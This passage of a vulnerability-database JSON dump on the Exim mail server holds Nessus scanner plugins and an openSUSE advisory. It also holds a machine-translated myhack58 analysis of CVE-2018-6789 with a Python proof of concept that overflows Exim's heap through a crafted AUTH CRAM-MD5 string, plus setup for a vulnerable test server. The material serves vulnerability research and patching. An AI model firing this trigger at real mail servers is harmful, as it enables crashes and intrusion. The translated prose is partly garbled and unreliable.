script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|16\\.04|16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 16.04 / 16.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.76-3ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"exim4-daemon-light\", pkgver:\"4.76-3ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.82-3ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"exim4-daemon-light\", pkgver:\"4.82-3ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.86.2-2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"exim4-daemon-light\", pkgver:\"4.86.2-2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"exim4-daemon-heavy\", pkgver:\"4.87-3ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"exim4-daemon-light\", pkgver:\"4.87-3ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim4-daemon-heavy / exim4-daemon-light\");\n}\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T09:49:58", "description": "Bjoern Jacke discovered that Exim, Debian's default mail transfer\nagent, may leak the private DKIM signing key to the log files if\nspecific configuration options are met.", "edition": 30, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2016-12-27T00:00:00", "title": "Debian DSA-3747-1 : exim4 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9963"], "modified": "2016-12-27T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:exim4"], "id": "DEBIAN_DSA-3747.NASL", "href": "https://www.tenable.com/plugins/nessus/96104", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3747. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96104);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-9963\");\n script_xref(name:\"DSA\", value:\"3747\");\n\n script_name(english:\"Debian DSA-3747-1 : exim4 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Bjoern Jacke discovered that Exim, Debian's default mail transfer\nagent, may leak the private DKIM signing key to the log files if\nspecific configuration options are met.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3747\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the exim4 packages.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-2+deb8u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"exim4\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-base\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-config\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-light\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-dbg\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-dev\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"eximon4\", reference:\"4.84.2-2+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-09-14T16:38:43", "description": "This update for exim fixes the following issues :\n\nChanges in exim :\n\n - specify users with ref:mail, to make them dynamic.\n (boo#1046971)\n\n - CVE-2017-1000369: Fixed memory leaks that could be\n exploited to 'stack crash' local privilege escalation\n (boo#1044692)\n\n - Require user(mail) group(mail) to meet new users\n handling in TW.\n\n - Prerequire permissions (fixes rpmlint).\n\n - conditionally disable DANE on SuSE versions with OpenSSL\n < 1.0\n\n - CVE-2016-1531: when installed setuid root, allows local\n users to gain privileges via the perl_startup argument. \n\n - CVE-2016-9963: DKIM information leakage (boo#1015930)\n\n\n\n - Makefile tuning :\n\n + add sqlite support\n\n + disable WITH_OLD_DEMIME\n\n + enable AUTH_CYRUS_SASL\n\n + enable AUTH_TLS\n\n + enable SYSLOG_LONG_LINES\n\n + enable SUPPORT_PAM\n\n + MAX_NAMED_LIST=64\n\n + enable EXPERIMENTAL_DMARC\n\n + enable EXPERIMENTAL_EVENT\n\n + enable EXPERIMENTAL_PROXY\n\n + enable EXPERIMENTAL_CERTNAMES\n\n + enable EXPERIMENTAL_DSN\n\n + enable EXPERIMENTAL_DANE\n\n + enable EXPERIMENTAL_SOCKS\n\n + enable EXPERIMENTAL_INTERNATIONAL", "edition": 17, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-08-30T00:00:00", "title": "openSUSE Security Update : exim (openSUSE-2017-980) (Stack Clash)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1531", "CVE-2016-9963", "CVE-2017-1000369"], "modified": "2017-08-30T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:eximstats-html", "p-cpe:/a:novell:opensuse:exim-debuginfo", "p-cpe:/a:novell:opensuse:exim", "p-cpe:/a:novell:opensuse:eximon-debuginfo", "cpe:/o:novell:opensuse:42.3", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:eximon", "p-cpe:/a:novell:opensuse:exim-debugsource"], "id": "OPENSUSE-2017-980.NASL", "href": "https://www.tenable.com/plugins/nessus/102834", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-980.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102834);\n script_version(\"3.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2016-1531\", \"CVE-2016-9963\", \"CVE-2017-1000369\");\n\n script_name(english:\"openSUSE Security Update : exim (openSUSE-2017-980) (Stack Clash)\");\n script_summary(english:\"Check for the openSUSE-2017-980 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for exim fixes the following issues :\n\nChanges in exim :\n\n - specify users with ref:mail, to make them dynamic.\n (boo#1046971)\n\n - CVE-2017-1000369: Fixed memory leaks that could be\n exploited to 'stack crash' local privilege escalation\n (boo#1044692)\n\n - Require user(mail) group(mail) to meet new users\n handling in TW.\n\n - Prerequire permissions (fixes rpmlint).\n\n - conditionally disable DANE on SuSE versions with OpenSSL\n < 1.0\n\n - CVE-2016-1531: when installed setuid root, allows local\n users to gain privileges via the perl_startup argument. \n\n - CVE-2016-9963: DKIM information leakage (boo#1015930)\n\n\n\n - Makefile tuning :\n\n + add sqlite support\n\n + disable WITH_OLD_DEMIME\n\n + enable AUTH_CYRUS_SASL\n\n + enable AUTH_TLS\n\n + enable SYSLOG_LONG_LINES\n\n + enable SUPPORT_PAM\n\n + MAX_NAMED_LIST=64\n\n + enable EXPERIMENTAL_DMARC\n\n + enable EXPERIMENTAL_EVENT\n\n + enable EXPERIMENTAL_PROXY\n\n + enable EXPERIMENTAL_CERTNAMES\n\n + enable EXPERIMENTAL_DSN\n\n + enable EXPERIMENTAL_DANE\n\n + enable EXPERIMENTAL_SOCKS\n\n + enable EXPERIMENTAL_INTERNATIONAL\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1015930\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1044692\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1046971\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximstats-html\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-debuginfo-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-debugsource-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximon-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximon-debuginfo-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximstats-html-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"exim-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"exim-debuginfo-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"exim-debugsource-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"eximon-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"eximon-debuginfo-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"eximstats-html-4.86.2-14.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-debugsource / eximon / etc\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2018-04-09T16:19:07", "bulletinFamily": "info", "cvelist": ["CVE-2018-6789", "CVE-2016-9963", "CVE-2017-1000368"], "edition": 1, "description": "Statement: disclosed herein is a method and script for study and research use, any team or individual may use the disclosure herein related to content engaged in the illegal network attacks, otherwise all the consequences by the user himself to bear with the author of this article has nothing to do. \n2018 2 November, the popular open source mail server Exim exposed a heap overflow vulnerability, CVE-2018-6789, and affected nearly 4. 90. 1 all the previous versions. \nThe vulnerability finders\u2014Taiwan security researcher Meh on the blog is provided the use of the vulnerability for remote code execution of the ideas in the tweets also indicate that the final bypass various mitigation measures to successfully achieve remote code execution: \n\n! [](/Article/UploadPic/2018-4/201849174458151. png? www. myhack58. com) \nCurrently Meh and not disclose the exploit code, Huawei the first place lab security researcher skysider based on Meh idea in the experiment environment the successful implementation of the remote command is executed, the associated vulnerability of the environment and the use of the code please visit: https://github.com/skysider/VulnPOC/tree/master/CVE-2018-6789 \n1\\. Vulnerability causes \nThe vulnerabilities of Genesis is the b64decode function in the non-standard base64-encoded data is decoded when the May overflow the stack of a byte, the comparison of the classic off-by-one vulnerability. \nThere are holes in the b64decode function part of the code is as follows: \nb64decode(const uschar *code, uschar **ptr) \n{ \nint x, y; \nuschar *result = store_get(3*(Ustrlen(code)/4) + 1); \n*ptr = result; \n/* Each cycle of the loop handles a quantum of 4 input bytes. For the last \nquantum this may decode to 1, 2, or 3 output bytes. */ \n...... \n} \nThis piece of code to decode the base64 logic is to put the 4 bytes as a group, the 4 bytes are decoded into 3 bytes, but when the last remaining 3 bytes that the len(code)=4n+3, will decode that into 2 bytes, the decoding after the total length is 3n+2 bytes, while the allocated heap space of size 3n+1, Therefore it will happen a stack overflow. Of course, given the official repair programme is also very simple, the multi-allocation of a few bytes. \n2\\. Environment to build \nMeh blog vulnerability test exim version is directly through the apt installation, but since the debian official has been fixed the warehouse in the exim vulnerability, you can view the package source code of the patch information to confirm: \nroot@skysider:~/poc/exim4-4.86.2# apt-get source exim4 \n...... \ndpkg-source: info: applying 93_CVE-2017-1000368. patch \ndpkg-source: info: applying fix_smtp_banner. patch \ndpkg-source: info: applying CVE-2016-9963. patch \ndpkg-source: info: applying CVE-2018-6789. patch \nWe choose to download an earlier version of the source code to compile the installation: \nsudo apt-get build-dep exim4 \nwget https://github.com/Exim/exim/releases/download/exim-4_89/exim-4.89.tar.xz \nDuring compilation you want to install some dependent libraries, you also need to modify the Makefile, create user, configuration, log file permissions, etc., can refer to the Dockerfile of the installation process. \nexim can be specified at run time configuration file, in order to trigger the vulnerability and command execution, you need to configure the CRAM-MD5 authenticator and is set acl_smtp_mail, etc., the configuration file is as follows: \nacl_smtp_mail=acl_check_mail \nacl_smtp_data=acl_check_data \nbegin acl \nacl_check_mail: \n. ifdef CHECK_MAIL_HELO_ISSUED \ndeny \nmessage = no HELO given before MAIL command \ncondition = ${if def:sender_helo_name {no}{yes}} \n. endif \naccept \nacl_check_data: \naccept \nbegin authenticators \nfixed_cram: \ndriver = cram_md5 \npublic_name = CRAM-MD5 \nserver_secret = ${if eq{$auth1}{ph10}{secret}fail} \nserver_set_id = $auth1 \nIn debug mode start the exim service: \nexim-bd-d-receive-C conf. conf \nYou can also directly use the docker to verify the vulnerability, the above commands for the default boot command of: \ndocker run-it --name exim-p 25:25 skysider/vulndocker:cve-2018-6789 \n3\\. Vulnerability testing \nWe use a simple poc to trigger the vulnerability, poc code is as follows: \n#!/ usr/bin/python \n# -*- coding: utf-8 -*- \nimport smtplib \nfrom base64 import b64encode \nprint \"this poc is tested in exim 4.89 x64 bit with cram-md5 authenticators\" \nip_address = raw_input(\"input ip address: \") \ns = smtplib. SMTP(ip_address) \n#s. set_debuglevel(1) \n# 1. put a huge chunk into unsorted bin \ns. ehlo(\"mmmm\"+\"b\"*0x1500) # 0x2020 \n# 2. send base64 data and trigger the off-by-one \n#raw_input(\"overwrite one byte of next chunk\") \ns. docmd(\"AUTH CRAM-MD5\") \npayload = \"d\"*(0x2008-1) \ntry: \ns. docmd(b64encode(payload)+b64encode('\\xf1\\xf1')[:-1]) \ns. quit() \nexcept smtplib. SMTPServerDisconnected: \nprint \"[!] exim server seems to be vulnerable to CVE-2018-6789.\" \nWhen executing this Code, it will trigger a memory error \n\n! [](/Article/UploadPic/2018-4/201849174458752. png? www. myhack58. com) \nIn this process, the stack of the main changes are as follows: \n\n! [](/Article/UploadPic/2018-4/201849174459960. png? www. myhack58. com) \nWe can go to observe the error before the stack, attach to the child process, the following figure is to send the ehlo message after the heap: \n\n! [](/Article/UploadPic/2018-4/201849174459191. png? www. myhack58. com) \nSend Auth data, we can look after executing the b64decode function after the heap: \n\n! [](/Article/UploadPic/2018-4/201849174459700. png? www. myhack58. com)\n\n**[1] [[2]](<89920_2.htm>) [[3]](<89920_3.htm>) [next](<89920_2.htm>)**\n", "modified": "2018-04-09T00:00:00", "published": "2018-04-09T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2018/89920.htm", "id": "MYHACK58:62201889920", "type": "myhack58", "title": "Exim Off-by-One RCE vulnerability of CVE-2018-6789 use analysis(reference EXP)-vulnerability warning-the black bar safety net", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2017-08-29T21:10:26", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1531", "CVE-2016-9963", "CVE-2017-1000369"], "description": "This update for exim fixes the following issues:\n\n Changes in exim:\n - specify users with ref:mail, to make them dynamic. (boo#1046971)\n\n - CVE-2017-1000369: Fixed memory leaks that could be exploited to "stack\n crash" local privilege escalation (boo#1044692)\n - Require user(mail) group(mail) to meet new users handling in TW.\n - Prerequire permissions (fixes rpmlint).\n\n - conditionally disable DANE on SuSE versions with OpenSSL < 1.0\n - CVE-2016-1531: when installed setuid root, allows local users to gain\n privileges via the perl_startup argument.\n - CVE-2016-9963: DKIM information leakage (boo#1015930)\n\n\n - Makefile tuning:\n + add sqlite support\n + disable WITH_OLD_DEMIME\n + enable AUTH_CYRUS_SASL\n + enable AUTH_TLS\n + enable SYSLOG_LONG_LINES\n + enable SUPPORT_PAM\n + MAX_NAMED_LIST=64\n + enable EXPERIMENTAL_DMARC\n + enable EXPERIMENTAL_EVENT\n + enable EXPERIMENTAL_PROXY\n + enable EXPERIMENTAL_CERTNAMES\n + enable EXPERIMENTAL_DSN\n + enable EXPERIMENTAL_DANE\n + enable EXPERIMENTAL_SOCKS\n + enable EXPERIMENTAL_INTERNATIONAL\n\n", "edition": 1, "modified": "2017-08-29T18:39:29", "published": "2017-08-29T18:39:29", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00072.html", "id": "OPENSUSE-SU-2017:2289-1", "title": "Security update for exim (important)", "type": "suse", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
